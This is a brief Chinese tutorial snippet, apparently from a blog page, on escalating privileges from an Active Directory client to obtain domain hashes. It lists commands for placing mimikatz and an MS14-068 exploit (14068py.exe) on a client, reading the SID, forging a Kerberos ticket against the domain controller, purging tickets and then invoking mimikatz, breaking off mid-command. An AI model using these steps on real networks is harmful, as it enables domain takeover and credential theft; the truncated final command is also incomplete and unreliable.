域客户机提权获取域hash值

总步骤: 将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号,再输入14068py.exe -u [email protected] -p “123.com” -s SID号 -d dc1.contoso.com获取[email protected],然后输入klist purge清除所有的票据,然后输入mimikatz.exe “kerberos::
相关文章
相关标签/搜索